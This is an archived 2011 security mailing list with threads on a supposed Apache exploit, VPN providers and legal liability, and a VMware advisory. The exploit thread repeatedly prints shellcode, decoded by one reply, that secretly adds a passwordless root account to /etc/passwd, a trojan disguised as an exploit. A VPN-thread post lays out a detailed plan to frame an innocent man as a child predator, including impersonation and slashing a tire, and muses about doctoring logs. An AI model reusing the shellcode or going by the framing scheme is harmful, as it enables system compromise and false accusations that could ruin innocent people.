boxes at the moment, can someone check this code in a VM? I am not sure if it is legit or not. http://pastebin.com/ygByEV2e [1] Thanks :) ~Darren * char evil[] = * xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89 * x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89 * x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8 * xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23 * x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74 * x3ax3ax30x3ax30x3ax73x34x66x65x6dx30x64x65x3a * x2fx72x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68 * x20x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64 * x23x41x41x41x41x42x42x42x42x43x43x43x43x44x44 * x44x44; ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html [2] Hosted and sponsored by Secunia - http://secunia.com/ [3] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html [5] Hosted and sponsored by Secunia - http://secunia.com/ [6] Links: -- [1] http://pastebin.com/ygByEV2e [2] http://lists.grok.org.uk/full-disclosure-charter.html [3] http://secunia.com/ [4] mailto:ve...@gen-x.co.nz [5] http://lists.grok.org.uk/full-disclosure-charter.html [6] http://secunia.com/ [7] mailto:sec...@gmail.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
On Tue, 04 Oct 2011 22:04:40 CDT, adam said: Good point Jeff, the real question is what does one do to fix it? http://www.google.com/search?q=related:www.aclu.org Amen to that. They're not perfect, but the ACLU and EFF are probably among our best bets during these times. pgpY26WQpOwbp.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
That raises a good question: could a good enough defense attorney convey that point to a judge well enough to get the charges dismissed? Then again, if they really believed a VPN service would protect them (even while violating their agreement with said provider) - there's probably at least * some* evidence on their machine implicating them. In the event that there's not though, I do wonder how it would play out. It'd make for a relatively easy set-up, if that were to work the way you suggested. You could doctor all of the logs to implicate them, and even go as far as to use the same software/configuration that they use. No matter how true their I have no idea what you're talking about actually is, the logs plus added evidence could likely be enough. That entire thing reminds me of something I thought about after watching to catch a predator a couple of times. You'll notice that in most cases, the predators respond the same way: they play stupid, pretend not to know what's going on, etc. Imagine if you knew someone in real life that worked at a pizza delivery place. Now also imagine that you hated said person. The undercovers on that show are all pretty predictable, and some of the tactics they use are present in every single bust. Keeping that in mind, and with enough research, you could easily find one of their undercovers online. Now imagine starting a dialogue with one of them, pretending to be the person who works at a pizza place (for sake of simplicity, we'll call him Mike). Imagine sending pictures of Mike to the undercover, talking about having sex with her, sending her nude pictures of you or other people, and so on. Then wait for one day that you know Mike person is working (and that you know undercover would be willing to meet). Figuring out the former would be a simple call to the pizza place Hey [name], do you know what time Mike comes in today? From there, you could tell the undercover that you'll come in your pizza delivery car so that no one suspects anything, so that she recognizes you, whatever - and tell her that you'll bring a pizza (maybe even go as far as to figure out her favorite kind for added evidence). During the day, lots of pizza places only have one or two drivers present. You could sit outside the pizza place and wait for [other driver] to leave and Mike to arrive (or do something to cause [other driver] not to make it back to the pizza place, e.g. slashing one of his tires on a fake delivery). There's lots of different ideas that could be implemented, as long as the end result is that you can guarantee Mike will be delivering the pizza. At which point, you call and request a delivery to undercover's house. Mike shows up there, undercover invites him inside and asks him to sit down - and at that point, Chris Hansen comes walking out. Even though everything Mike would say is indeed true, it'd sound like BS if we believed he had been talking to the undercover for a couple of months. He'd play stupid and would be charged with felony offenses of trying to entice a child/yada yada. In that situation, even if he could somehow come up with proof that he was set up - no one's gonna believe a pervert. It's just something that I've thought about a lot, and I wonder how many others have as well (and I especially wonder if anyone has ever attempted it). On Wed, Oct 5, 2011 at 12:06 AM, Laurelai laure...@oneechan.org wrote: On 10/4/2011 7:52 PM, adam wrote: Its frightening how much power judges have, and how poorly they are overseen. Definitely agree there. Some of the civil cases are disgustingly bad, due to there being no media attention and no real oversight. The civil case mentioned above is a good example, and all of the excessive child support orders even further that. On topic: I haven't read every single reply here, but from what I've seen: no one has mentioned the VPN provider being held personally responsible. Being that the attacks originated from machines they own, if they failed to turn over user information, could it really be that difficult to pin the attacks on them and convince a judge that they were responsible? On Tue, Oct 4, 2011 at 9:37 PM, Jeffrey Walton noloa...@gmail.com wrote: On Tue, Oct 4, 2011 at 10:32 PM, adam a...@papsy.net wrote: http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/crm00754.htm Did you actually read the link you pasted? [...] and criminal penalties may not be imposed on someone who has not been afforded the protections that the Constitution requires of such criminal proceedings [...] protections include the right [..] Then take a look at the actual rights being referenced. Most of which would be violated as a result. In response to 0x41 This is ONCE you are actually in front, of the judge...remember, it may take some breaking of civil liberty, for this to happen... No, you're absolutely right. That's the point here. Contempt is attached to the previous court order,
Re: [Full-disclosure] VPN providers and any providers in general...
Amen to that. They're not perfect, but the ACLU and EFF are probably among our best bets during these times. Agreed. I know the ACLU gets a lot of flack for stepping on peoples' toes, but no matter what their *alleged* agenda is - they've done a whole lot of good that would have otherwise never existed. Same with the EFF. It gives, even if only a tiny amount, some hope in situations where you'd otherwise be completely helpless. On Tue, Oct 4, 2011 at 10:26 PM, valdis.kletni...@vt.edu wrote: On Tue, 04 Oct 2011 22:04:40 CDT, adam said: Good point Jeff, the real question is what does one do to fix it? http://www.google.com/search?q=related:www.aclu.org Amen to that. They're not perfect, but the ACLU and EFF are probably among our best bets during these times. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
Yeah but the problem with China is that they're TOO dedicated, and all try to log in at the same time to fix the problem, which ends up causing the server to go down. It amazes me how big some of their hearts can be though. On Tue, Oct 4, 2011 at 10:06 PM, VeNoMouS ve...@gen-x.co.nz wrote: ** I dunno china offers usa that kind of support all the time . or so i heard On Tue, 4 Oct 2011 21:41:08 -0500, adam wrote: Wow, I'm extremely impressed with the support that the developer of this exploit offers. I had been trying to get the exploit to work for about an hour or so (couldn't get root on the target) and noticed that the developer of this exploit logged into my machine (using an old account I must have set up a while ago named w000t). I couldn't believe it when I saw that he was logging in to fix the problem, I've NEVER gotten that kind of support even out of paid software. He's been logged in for a couple of hours now, and I've noticed that he's downloaded/uploaded quite a bit (probably downloading the log files and then uploading patches) so I'm just gonna wait it out. I definitely have a good feeling about this though. On Tue, Oct 4, 2011 at 9:21 PM, xD 0x41 sec...@gmail.com wrote: yer it is clarly leet stuff dude... i ran it and got liek 2000k2.2.* apache user bot in a night! :P hgehe (jkin) funny tho. xd On 5 October 2011 13:09, VeNoMouS ve...@gen-x.co.nz wrote: char evil[] = \xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46 \x47\x89 \x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e \x51\x89 \x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd \x80\xe8 \xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d \x63\x23 \x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30 \x30\x74 \x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64 \x65\x3a \x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61 \x73\x68 \x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73 \x77\x64 \x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43 \x44\x44 \x44\x44 . execl(/bin/sh, sh, -c, evil, 0); . /bin/echo w000t::0:0:s4fem0de:/root:/bin/bash /etc/passwd AHUH. On Mon, 3 Oct 2011 15:31:29 +0100, Darren Martyn wrote: I regularly trawl Pastebin.com to find code - often idiots leave some 0day and similar there and it is nice to find. Well, seeing as I have no test boxes at the moment, can someone check this code in a VM? I am not sure if it is legit or not. http://pastebin.com/ygByEV2e Thanks :) ~Darren 1. char evil[] = 2. \xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88 \x46\x47\x89 3. \x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89 \x5e\x51\x89 4. \x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55 \xcd\x80\xe8 5. \xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23 \x2d\x63\x23 6. \x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30 \x30\x30\x74 7. \x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30 \x64\x65\x3a 8. \x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62 \x61\x73\x68 9. \x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73 \x73\x77\x64 10. \x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43 \x43\x43\x44\x44 11. \x44\x44; ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
(using an old account I must have set up a while ago named w000t). err..but, you ran it didnt you... so why would u need any old account :P hehe... just... something wich i find strange. I dont see any support would be good here :) lol i betting he does ONLy patch to stop the thing being re-rooted, as it has become public since posted onlist ;) hehe you shuld really not let him do much, if thats even true, wich i really am doubting... specially since u named this old account...when, also saying u tried to run it..wich would, exec shellcode...so i guess.. once cleared up, and if true, i know this is done by MANY smarter hax, and, your IP if it was ran, prolly also gets emailed somewhere, somehow... or, some alert made, or maybe, not.. but, if he was so fast to login then i wonder... but, then, he is only stopping it, frok other hackers, not from, other nice guys :) xd On 5 October 2011 14:06, VeNoMouS ve...@gen-x.co.nz wrote: ** I dunno china offers usa that kind of support all the time . or so i heard On Tue, 4 Oct 2011 21:41:08 -0500, adam wrote: Wow, I'm extremely impressed with the support that the developer of this exploit offers. I had been trying to get the exploit to work for about an hour or so (couldn't get root on the target) and noticed that the developer of this exploit logged into my machine (using an old account I must have set up a while ago named w000t). I couldn't believe it when I saw that he was logging in to fix the problem, I've NEVER gotten that kind of support even out of paid software. He's been logged in for a couple of hours now, and I've noticed that he's downloaded/uploaded quite a bit (probably downloading the log files and then uploading patches) so I'm just gonna wait it out. I definitely have a good feeling about this though. On Tue, Oct 4, 2011 at 9:21 PM, xD 0x41 sec...@gmail.com wrote: yer it is clarly leet stuff dude... i ran it and got liek 2000k2.2.* apache user bot in a night! :P hgehe (jkin) funny tho. xd On 5 October 2011 13:09, VeNoMouS ve...@gen-x.co.nz wrote: char evil[] = \xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46 \x47\x89 \x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e \x51\x89 \x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd \x80\xe8 \xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d \x63\x23 \x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30 \x30\x74 \x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64 \x65\x3a \x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61 \x73\x68 \x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73 \x77\x64 \x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43 \x44\x44 \x44\x44 . execl(/bin/sh, sh, -c, evil, 0); . /bin/echo w000t::0:0:s4fem0de:/root:/bin/bash /etc/passwd AHUH. On Mon, 3 Oct 2011 15:31:29 +0100, Darren Martyn wrote: I regularly trawl Pastebin.com to find code - often idiots leave some 0day and similar there and it is nice to find. Well, seeing as I have no test boxes at the moment, can someone check this code in a VM? I am not sure if it is legit or not. http://pastebin.com/ygByEV2e Thanks :) ~Darren 1. char evil[] = 2. \xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88 \x46\x47\x89 3. \x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89 \x5e\x51\x89 4. \x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55 \xcd\x80\xe8 5. \xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23 \x2d\x63\x23 6. \x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30 \x30\x30\x74 7. \x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30 \x64\x65\x3a 8. \x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62 \x61\x73\x68 9. \x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73 \x73\x77\x64 10. \x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43 \x43\x43\x44\x44 11. \x44\x44; ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
I still think press drives many and more takedowns, and bends the arms of others to.. for sure. I know of a case here of petty crime, but is relevant ok, the guy had many many, and big charges of murder,manslaughter, in other states within australia, but was asked for his name, in 'vic' , wich (about 10yrs ago - pre babybrother to usa) , draconian like laws enabled police to yes, put ppl in jail for this. So, he took the temporary jail, and monthly, would b brought b4 the judge, and asked again eveytime for the name/address so his infos could be checked. each time he would return... waiting for laws to change. evtually, they just had no room, and threw him out with a slap ion wrist fine... then later, they could not do crap about his murder etc, and he is still free t this day, simply by doing alittle bit of that time, and, not taking the *definate 15+* :P Smart, and only would happen NON usa, but yes, USA and USA press has TOO much power in court, altho online, I think the press if it gets involed* it is always seen as big, because since when is ITsec involved?only wen you hear of mass fraud...etcso, any case would become classed as oh must be fraud or sumthin BIG for them to get arrested.. is indeed fact... but, it does take sometimes the press, or others, to simply expose it. many cases are, self explanatory but, some cases are really interesting... although, laws change somuch in usa, it is scarier than the other scary bits ;p cheers, xd On 5 October 2011 13:52, adam a...@papsy.net wrote: Its frightening how much power judges have, and how poorly they are overseen. Definitely agree there. Some of the civil cases are disgustingly bad, due to there being no media attention and no real oversight. The civil case mentioned above is a good example, and all of the excessive child support orders even further that. On topic: I haven't read every single reply here, but from what I've seen: no one has mentioned the VPN provider being held personally responsible. Being that the attacks originated from machines they own, if they failed to turn over user information, could it really be that difficult to pin the attacks on them and convince a judge that they were responsible? On Tue, Oct 4, 2011 at 9:37 PM, Jeffrey Walton noloa...@gmail.com wrote: On Tue, Oct 4, 2011 at 10:32 PM, adam a...@papsy.net wrote: http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/crm00754.htm Did you actually read the link you pasted? [...] and criminal penalties may not be imposed on someone who has not been afforded the protections that the Constitution requires of such criminal proceedings [...] protections include the right [..] Then take a look at the actual rights being referenced. Most of which would be violated as a result. In response to 0x41 This is ONCE you are actually in front, of the judge...remember, it may take some breaking of civil liberty, for this to happen... No, you're absolutely right. That's the point here. Contempt is attached to the previous court order, there wouldn't be a new judge/new case for the contempt charge alone. All of it is circumstantial anyway, especially due to how much power judges actually have (in both criminal AND civil proceedings). Its frightening how much power judges have, and how poorly they are overseen. Confer: Judge James Ware, US 9th Circuit Court (this is not a local judge in a hillbilly town). Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
hmm.. yes interesting.. On the flip side would it be that hard for a malicious person who works at a VPN provider to blame it on a customer? I don't think that's what has happened in this case, but hypothetically what is to stop a rouge employee from abusing the trust that a LE official might have and doctoring logs sent to them? Absolutely nothing :) This is where, as i was saying... a shell owner/employee, could easily make any police run in circles simply trying to get a decent tap on something... this is where it gets cloudy... but, this is what is being questioned on this threead to... I guess we have gotten somewhere. A. Do NOT use VPN and shell services, to commit crime B. Do NOT commit crimes, in USA,especially those of a large-scale cyber nature,and C. I apprently am laurelai and, i like popcorn (both are false) Cheers! xd On 5 October 2011 14:30, adam a...@papsy.net wrote: That raises a good question: could a good enough defense attorney convey that point to a judge well enough to get the charges dismissed? Then again, if they really believed a VPN service would protect them (even while violating their agreement with said provider) - there's probably at least *some* evidence on their machine implicating them. In the event that there's not though, I do wonder how it would play out. It'd make for a relatively easy set-up, if that were to work the way you suggested. You could doctor all of the logs to implicate them, and even go as far as to use the same software/configuration that they use. No matter how true their I have no idea what you're talking about actually is, the logs plus added evidence could likely be enough. That entire thing reminds me of something I thought about after watching to catch a predator a couple of times. You'll notice that in most cases, the predators respond the same way: they play stupid, pretend not to know what's going on, etc. Imagine if you knew someone in real life that worked at a pizza delivery place. Now also imagine that you hated said person. The undercovers on that show are all pretty predictable, and some of the tactics they use are present in every single bust. Keeping that in mind, and with enough research, you could easily find one of their undercovers online. Now imagine starting a dialogue with one of them, pretending to be the person who works at a pizza place (for sake of simplicity, we'll call him Mike). Imagine sending pictures of Mike to the undercover, talking about having sex with her, sending her nude pictures of you or other people, and so on. Then wait for one day that you know Mike person is working (and that you know undercover would be willing to meet). Figuring out the former would be a simple call to the pizza place Hey [name], do you know what time Mike comes in today? From there, you could tell the undercover that you'll come in your pizza delivery car so that no one suspects anything, so that she recognizes you, whatever - and tell her that you'll bring a pizza (maybe even go as far as to figure out her favorite kind for added evidence). During the day, lots of pizza places only have one or two drivers present. You could sit outside the pizza place and wait for [other driver] to leave and Mike to arrive (or do something to cause [other driver] not to make it back to the pizza place, e.g. slashing one of his tires on a fake delivery). There's lots of different ideas that could be implemented, as long as the end result is that you can guarantee Mike will be delivering the pizza. At which point, you call and request a delivery to undercover's house. Mike shows up there, undercover invites him inside and asks him to sit down - and at that point, Chris Hansen comes walking out. Even though everything Mike would say is indeed true, it'd sound like BS if we believed he had been talking to the undercover for a couple of months. He'd play stupid and would be charged with felony offenses of trying to entice a child/yada yada. In that situation, even if he could somehow come up with proof that he was set up - no one's gonna believe a pervert. It's just something that I've thought about a lot, and I wonder how many others have as well (and I especially wonder if anyone has ever attempted it). On Wed, Oct 5, 2011 at 12:06 AM, Laurelai laure...@oneechan.org wrote: On 10/4/2011 7:52 PM, adam wrote: Its frightening how much power judges have, and how poorly they are overseen. Definitely agree there. Some of the civil cases are disgustingly bad, due to there being no media attention and no real oversight. The civil case mentioned above is a good example, and all of the excessive child support orders even further that. On topic: I haven't read every single reply here, but from what I've seen: no one has mentioned the VPN provider being held personally responsible. Being that the attacks originated from machines they own, if they failed to turn over user information, could it
Re: [Full-disclosure] VPN providers and any providers in general...
Oh for sure, if it was not for these people really, none of those crimes wich really did annoy us, would have happened. So, i am all for them. and what theyre agenda is. i guess, you just do not abuse things, and expect to be getting away with it.. On 5 October 2011 14:34, adam a...@papsy.net wrote: Amen to that. They're not perfect, but the ACLU and EFF are probably among our best bets during these times. Agreed. I know the ACLU gets a lot of flack for stepping on peoples' toes, but no matter what their *alleged* agenda is - they've done a whole lot of good that would have otherwise never existed. Same with the EFF. It gives, even if only a tiny amount, some hope in situations where you'd otherwise be completely helpless. On Tue, Oct 4, 2011 at 10:26 PM, valdis.kletni...@vt.edu wrote: On Tue, 04 Oct 2011 22:04:40 CDT, adam said: Good point Jeff, the real question is what does one do to fix it? http://www.google.com/search?q=related:www.aclu.org Amen to that. They're not perfect, but the ACLU and EFF are probably among our best bets during these times. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] VMSA-2011-0011 VMware hosted products address remote code execution vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - VMware Security Advisory Advisory ID: VMSA-2011-0011 Synopsis: VMware hosted products address remote code execution vulnerability Issue date:2011-10-04 Updated on:2011-10-04 (initial release of advisory) CVE numbers: CVE-2011-3868 - 1. Summary Hosted product updates address a remote code execution vulnerability in the way UDF file systems are handled 2. Relevant releases VMware Workstation 7.1.4 and earlier VMware Player 3.1.4 and earlier VMware Fusion 3.1.2 and earlier 3. Problem Description a. UDF file system import remote code execution A buffer overflow vulnerability is present in the way UDF file systems are handled. This issue could allow for code execution if a user installs from a malicious ISO image that was specially crafted by an attacker. VMware would like to thank an anonymous contributor working with the SecuriTeam Secure Disclosure program for reporting this issue to us. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name 3868.11-3868 to the issue. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ ProductVersion on Apply Patch = === = vCenterany Windows not affected Workstation8.x any not affected Workstation7.x any 7.1.5 or later Player 3.x any 3.1.5 or later AMSany any not affected Fusion 4.x Mac OS/X not affected Fusion 3.1.x Mac OS/X 3.1.3 or later ESXi any ESXi not affected ESXany ESX not affected 4. Solution Please review the patch/release notes for your product and version and verify the checksum of your downloaded file. VMware Workstation 7.1.5 http://www.vmware.com/go/downloadworkstation Release notes: http://downloads.vmware.com/support/ws71/doc/releasenotes_ws715.html VMware Workstation for Windows 32-bit and 64-bit with VMware Tools md5sum: 40a0a39377a6ba804d5e76e59449d51f sha1sum: 25462e18bf9439876c63948415f7ba7b09baa8e6 VMware Workstation for Linux 32-bit with VMware Tools md5sum: 9c9b4d7a749f1baa485f26e6f366c070 sha1sum: 31033424656b8eaaa814f3e9c3b5b9c5c53b783b VMware Workstation for Linux 64-bit with VMware Tools md5sum: 482b8b2890f75488addfc31418031864 sha1sum: b1f73650f70c94249e5add5d9516d0e45c4ae87d VMware Player 3.1.5 --- http://www.vmware.com/go/downloadplayer Release notes: https://www.vmware.com/support/player31/doc/releasenotes_player315.html VMware Player for 32-bit and 64-bit Windows md5sum: fcc91227963e58efcb63fb791d2fd813 sha1sum: d39d9da694c22530a7fa701e3ded6cccdc3ea390 VMware Player for 32-bit Linux md5sum: c96867c8093d23065bed7e71e020bb19 sha1sum: 4156bdfb7f679114671b416d178028fdc4d3beb4 VMware Player for 64-bit Linux md5sum: 1ec954f1baaf6a60e451979b5e88f2d6 sha1sum: a253a486d6c6848620de200ef1837ced903daa1c VMware Fusion 3.1.3 --- http://www.vmware.com/go/downloadfusion Release Notes: http://downloads.vmware.com/support/fusion3/doc/releasenotes_fusion_313.htm l VMware Fusion for Intel-based Macs md5sum: f35ac5c15354723468257d2a48dc4f76 sha1sum: 3c849a62c45551fddb16eebf298cef7279d622a9 5. References CVE numbers http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3868 - 6. Change log 2011-10-04 VMSA-2011-0011 Initial security advisory in conjunction with the release of VMware Workstation 7.1.5 and Player 3.1.5 on 2011-10-04. - --- 7. Contact E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce This Security Advisory is posted to the following lists: * security-announce at lists.vmware.com * bugtraq at securityfocus.com * full-disclosure at lists.grok.org.uk E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055 VMware Security Advisories http://www.vmware.com/security/advisories VMware security response policy http://www.vmware.com/support/policies/security_response.html General support life cycle policy http://www.vmware.com/support/policies/eos.html VMware Infrastructure support life cycle policy
Re: [Full-disclosure] VPN providers and any providers in general...
On Tue, Oct 4, 2011 at 9:04 PM, xD 0x41 sec...@gmail.com wrote: ... This is where, as i was saying... a shell owner/employee, could easily make any police run in circles simply trying to get a decent tap on something... yeah, then they just take whole provider, e.g.: On Sept. 22nd, Microsoft filed for an ex parte temporary restraining order from the U.S. District Court for the Eastern District of Virginia against Dominique Alexander Piatti, dotFREE Group SRO and John Does 1-22. The court granted our request, allowing us to sever the known connections between the Kelihos botnet and the individual “zombie computers” under its control. Immediately following the takedown on Sept. 26th, we served Dominique Alexander Piatti, who was living and operating his business in the Czech Republic, and dotFREE Group SRO, with notice of the lawsuit and began discussions with Mr. Piatti to determine which of his subdomains were being used for legitimate business, short of it is basic = be a discerning customer. - vpn providers that don't log are better than logging for any period no matter how short. - vpn providers that are technically competent are better than those which will expose you through leaks or when cracked. - vpn providers resistant to jurisdictional and payment processor pressure are better than those using easily coerced services, third parties, or vendors. - no vpn provider is resistant to you being an ass. if you raise big heat directly and exclusively on a VPN provider you are both stupid and subject to them cutting your service if not dumping your logs. this can be said another way: don't be stupid :) the incompetent and twofaced should be exposed however. i hear attrition.org likes to keep lists and name names ... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
